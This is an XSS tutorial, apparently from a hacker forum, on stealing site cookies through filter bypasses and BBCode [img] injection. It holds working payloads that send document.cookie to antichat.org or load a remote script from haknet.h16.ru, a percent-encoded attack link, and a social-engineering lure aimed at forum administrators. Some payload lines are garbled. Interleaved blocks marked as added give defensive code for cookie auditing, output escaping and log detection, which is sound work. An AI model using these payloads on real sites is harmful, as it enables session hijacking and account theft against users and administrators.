Description: XSS from A to Z.



  • XSS is CSS => Cross Site Scripting
  • How to use XSS
  • What is an XSS attack?
  • What is passive and active XSS?
  • So, let's get specifically to how to find XSS on a site.
  • And how do you determine whether there is a filter or not?
  • Active XSS
  • The test codes we kept using
  • How can I put it into a link with XSS?


  • XSS is CSS => Cross Site Scripting

    It is written XSS so as not to be confused with CSS.
    This bug first appeared in 1997.



    How to use XSS.


    First, we need to know what a cookie is.
    If you already know, you can skip this.

    Cookies are used to store site credentials on the visitor's computer.
    If you registered on a site under the nickname 'blabluble', the site saved a cookie file on your computer, where your data is stored in encoded form.
    And if you are an administrator with access to the site, and I am a user who has stolen your (admin) cookies, then I can calmly go to the site, the site identifies me as 'admin', and I get administrator rights.

    To substitute (replace your own with the stolen) cookies I advise using CookieEdit for IE, or the built-in functions in Opera and Firefox.

    To intercept cookies, you need to find a place on the site where you can carry out an XSS attack.
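The cookie theft described above works because the stealing script can read the session cookie through document.cookie. The following check, added here as an example and not code from the original post or from any forum software, parses a Set-Cookie header and reports the attributes (HttpOnly, Secure, SameSite) that take the cookie out of reach of that script or limit where it is sent. The header strings in SAMPLE_HEADERS are constructed for illustration.

```javascript
// Added example (not from the original post): audit a Set-Cookie header for
// the attributes that limit the damage of the cookie theft described above.
// The header strings in SAMPLE_HEADERS are constructed for illustration.

// Split "name=value; Attr; Attr=val" into its pieces. Attribute names are
// case-insensitive, so they are lower-cased; bare flags map to true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const value = eq === -1 ? '' : parts[0].slice(eq + 1);
  const attrs = {};
  for (const part of parts.slice(1)) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return { name, value, attrs };
}

// Report what is missing on a session cookie. HttpOnly is the attribute that
// keeps document.cookie (the value the stealing script reads) from seeing it.
function auditSessionCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const findings = [];
  if (!('httponly' in attrs)) findings.push('HttpOnly missing: readable via document.cookie');
  if (!('secure' in attrs)) findings.push('Secure missing: sent over plain HTTP');
  const sameSite = typeof attrs.samesite === 'string' ? attrs.samesite.toLowerCase() : '';
  if (sameSite !== 'lax' && sameSite !== 'strict') findings.push('SameSite not Lax or Strict');
  return { name, findings };
}

// Constructed headers: the first is the bare form, the second is hardened.
const SAMPLE_HEADERS = [
  'sessid=abc123; Path=/',
  'sessid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
];

for (const h of SAMPLE_HEADERS) {
  const { name, findings } = auditSessionCookie(h);
  console.log(name, findings.length ? findings : ['ok']);
}
```

With HttpOnly set, the `img.src = "...?" + document.cookie` trick shown later on this page sends an empty string, because the browser never exposes the cookie to script.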


    What is an XSS attack?


    XSS attacks are attacks not on the site itself, but on the site's users.
    XSS is a flaw in the application's filtering.

    There are passive XSS and active XSS.

    What is passive and active XSS?


    Passive - these are XSS that require the victim's direct participation, plus there are certain limitations and difficulties.
    Therefore, passive XSS is not valued very highly.
    For example, you need to get the victim to follow a poisoned link, which requires social engineering and cunning.

    Active - these are XSS that do not require any additional action from the victim: it is enough just to open the page containing your XSS and the JavaScript runs automatically.
    Thanks to this automation they are very useful and valuable.
    For example, active XSS exists in BB tags because of insufficient filtering: when you leave a message on a forum / guestbook / chat, it stays active on every page load.




    So, let's get specifically to how to find XSS on a site.


    As I wrote before, XSS consists of tags, that is, of HTML and JavaScript =).

    JavaScript can be entered inside HTML.
    It can be encoded to bypass filters. But more on that later.

    How do you know whether XSS goes through on a given site?
    The classic one is:
    <script>alert()</script> We try to insert this script into all the different fields... if a message box appeared, the script was processed and executed.

    The most common XSS (seen everywhere the filtering is bad):

    "><script>alert()</script>

    The whole point is the "> .

    Let's think about what happens when we type "><script>alert()</script> into a field.

    We enter the value "><script>alert()</script> into the form field. The value is processed: the "> closes the attribute and the tag it sits in,

    and then <script>alert()</script> is invoked.

    This XSS is most common in search forms:

    We go through all the fields of the site and try to insert "><script>alert()</script>
    If the message box came up - you found XSS...




    And how do you determine whether there is a filter or not?


    Just enter the following in any field: '';!--"<########>=&{()}
    Then open the page's HTML source and look for the word "########"
    and look at the characters around it..

    If <> remained as they were, that is the first sign of vulnerability - the filter has a hole.
    If the characters , " \ are the same as they were entered - this is the second sign of vulnerability - extra characters are available for the subsequent XSS attack.
    So, if you opened the HTML and found <> intact, there is most likely a hole in the filter.
    If you opened the HTML and found that <> were replaced with other characters, then that's a bummer - a proper filter
    that works normally.
    You can also enter the following in the field to check the filtering: "><>'"`,/\?@%

    Consider the case where the filter eats <>.

    In this case there is still a chance of a hole.
    For example, the filter's rule is to eat <script>, <> and so on.
    Then try <zxcvb script:alert();

    The filter sees nothing dangerous in <IMG%20SRC="java script:alert(); - no, it lets it through, and thereby
    the script executes.

    Of course, if the filter does not filter different encodings, you can try to encode the script and insert the code.

    You have to try everything and find it...
    Enter things in the fields and carefully review what we got back from the filter.
    Trial and error is the way to understand how the filter works and whether it has any flaws.
    If the filter is bad, we can always insert scripts.




    Active XSS


    Here you need to use the allowed tags and hide the request inside them; you need to get the request executed.

    For example, the url, bb, img tags.
    The whole point of the insertion is that we need to embed the request into an img or url parameter. img has many parameters besides src and alt.
    This bug is very often used on forums, in guestbooks...

    Consider active XSS.

    Warning!!!

    The tags [fon * t], [im * g], [ur * l] are written with a * so that they are not parsed by the forum software.
    To use these tags, delete the *.

    For example, look over the forum for the use of the tags [fon * t], [im * g], [ur * l] and try to insert a script into them or combine them:

    [im * g]httr://www.qwewqw.ru/1.jpg[/im * g] A cross (broken-image icon) appears... it means img is processed and we've caught it (it can happen that img is enabled but the admins removed it from the message-creation form, saying pictures cannot be inserted, while the tag can still be used in
    various forms). If there is no cross... and the whole text just hangs there as typed, then try this:
    [im * g src=httr://www.qwewqw.ru/1.jpg]

    Well, say we got a cross with this:
    [im * g]httr://www.qweqw.ru/1.jpg[/im * g]

    Check whether the filter keeps a space: add a space after the jpg extension:
    [im * g]httr://www.qweqw.ru/1.jpg [/im * g]
    If there is a cross - then everything is OK.

    Further, there are the img parameters dynsrc and lowsrc, which take javascript. We try to insert, for example:
    [im * g]http://www.qwewqw.ru/1.jpg dynsrc=java script:alert()[/im * g]
    Check, send - the message box appears - it means you found an active XSS, and instead of alert() you can insert any script.

    If the filter does not give in, try this:
    [im * g]http://www.qweqw.ru/"/dynsrc="java script:alert()"/1.jpg[/im * g]
    and
    [im * g]http://www.qwewqw.ru/"/dynsrc=java script:alert()/1.jpg[/im * g]

    If one of the examples above gave a cross, then httr://www.qweqw.ru/1.jpg is replaced with the address of the sniffer.

    There are times when jpg is disabled by the administrator.
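Both the "> breakout from the filter section and the [img] parameter trick above come down to the same mistake: user text is pasted into HTML where it can end an attribute or start a new one. The block below is an added example, not code from the original post or from any forum software; the function names and the sample inputs are its own. It shows the echoing search box with proper attribute encoding, the blacklist filter the post describes next to it to make clear why stripping <script> is not a fix, and a BBCode [img] renderer that accepts only one bare http(s) URL so nothing after the filename can become a dynsrc or lowsrc attribute.

```javascript
// Added example (not from the original post): the defender's side of the two
// tricks above, the "> breakout in an echoed form field and the extra
// parameters smuggled into a BBCode [img] tag. Function names and the sample
// inputs are this example's own, not the forum software's.

// Encode the characters that end an HTML text node or a quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// A search form that echoes the query into value="...": with encoding, the
// "> that the post relies on can no longer close the attribute.
function renderSearchBox(query) {
  return `<input type="text" name="q" value="${escapeHtml(query)}">`;
}

// The kind of blacklist the post describes (eat <script>), kept only to show
// why it is not a fix: anything that is not literally a script tag passes.
function naiveBlacklist(s) {
  return s.replace(/<\/?script>/gi, '');
}

// Safe [img] rendering: the body must be one absolute http(s) URL made of
// URL characters only, so "1.jpg dynsrc=..." or a quote inside the body is
// rejected instead of being pasted into the tag as new attributes.
const IMG_TAG = /^\[img\](.+)\[\/img\]$/i;
function renderImgTag(bbcode) {
  const m = IMG_TAG.exec(bbcode.trim());
  if (!m) return null;
  const body = m[1].trim();
  if (/[\s"'<>]/.test(body)) return null;          // no whitespace or quotes at all
  let url;
  try { url = new URL(body); } catch (e) { return null; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return `<img src="${escapeHtml(url.href)}" alt="">`;
}

console.log(renderSearchBox('"><script>alert()</script>'));
console.log(renderImgTag('[img]http://www.qweqw.ru/1.jpg[/img]'));
console.log(renderImgTag('[img]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/img]'));
```

The renderer rejects rather than cleans: a body with a space, a quote or a non-http scheme returns null and the tag is shown as plain text, which is the outcome the post calls "the whole text just hangs there".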




    The test codes we kept using


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg and so on..
    But they did not bring any benefit; they are just codes for testing (checking) for XSS.

    Here's the script:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    This one already steals cookies =)




    How can I put it into a link with XSS?


    Yes, very easy...
    There are several options:

    - 1) we do this:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> where ***** is the site with the XSS.

    Here is the assembled script:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) You can also do this:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> where it refers to http://haknet.h16.ru/script/js.js

    And in js.js there is:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; This method is more reliable.

    But as I already wrote - sometimes there are difficulties with the filters on the site (our script doesn't go through).
    Then you need to think about how to get around it.
    You can add something, change something, or delete something in the script.
    But there is a more reliable option: we simply encode the script. There are a lot of programs for this.
    There is a site, http://ha.ckers.org/xss.html (encoder-decoder).

    Here's an example:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    This is the encoded form of:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Encoding is needed not only to deceive the filters, but also to deceive the ADMIN when using passive XSS.

    Here is an example based on social engineering.
    We look for contact with the forum administrator, we send him a link to our site on the forum, saying "there is such a cool feature on the site" and so on in the same spirit.
    And on our site, as you have already guessed =), is this script:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    What does document.location.href do, you ask me? )).. This is JavaScript that sends the browser to the specified address without any prompt. So here's what happens: we give the admin a link, he goes to our site, and it immediately throws him to

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E and this is already our XSS in encoded form.

    Note: this will only work when the XSS is on the site whose administrator you gave the link to...
    In other words, the DIFFICULTY OF PASSIVE XSS is that the vulnerability can be used ONLY if the victim is LOGGED IN on the vulnerable site!!!
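The percent-encoded link used twice above defeats a filter or a reviewer only as long as nobody decodes it before looking. The following check, added here as an example and not code from the original post, is the log-side counterpart: it percent-decodes a request line repeatedly (so double encoding does not help either) and then matches the markers this page is built around, the script tag, the javascript: scheme, the '> / "> breakout and inline event handlers. The request lines in SAMPLE_REQUESTS are constructed; ENCODED_LINK is the encoded value quoted in the post, with the stray whitespace removed.

```javascript
// Added example (not from the original post): a log-side check that undoes
// percent-encoding before matching, so the encoded link shown in the post is
// caught the same way as its plain form. Request lines are constructed; the
// encoded value is the one quoted in the post above.

// Decode %XX sequences repeatedly (bounded), since a payload may be encoded
// more than once. A malformed sequence stops the decoding at that round.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Markers to look for after decoding: script tags, the javascript: scheme,
// the '> / "> breakout, and inline event handlers.
const XSS_MARKERS = [
  { label: 'script tag', re: /<script/i },
  { label: 'javascript: scheme', re: /javascript\s*:/i },
  { label: 'attribute breakout', re: /['"]\s*>\s*</ },
  { label: 'event handler', re: /\bon\w+\s*=/i },
];

// Returns the decoded line, whether it looks suspicious, and which markers hit.
function inspectRequest(line) {
  const decoded = fullyDecode(line);
  const hits = XSS_MARKERS.filter((m) => m.re.test(decoded)).map((m) => m.label);
  return { decoded, suspicious: hits.length > 0, hits };
}

// The encoded link from the post (whitespace removed).
const ENCODED_LINK = '%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E';

// Constructed access-log request lines: a benign one, a double-encoded one,
// and the post's encoded link.
const SAMPLE_REQUESTS = [
  'GET /free?p=hello+world HTTP/1.1',
  'GET /free?p=%2527%253E%253Cscript%253Ealert()%253C%252Fscript%253E HTTP/1.1',
  ENCODED_LINK,
];

for (const line of SAMPLE_REQUESTS) {
  const r = inspectRequest(line);
  console.log(r.suspicious ? 'ALERT' : 'ok   ', r.hits.join(', ') || '-', r.decoded);
}
```

Matching is done only on the decoded form; the raw line is kept alongside so an alert can be traced back to the exact bytes that arrived.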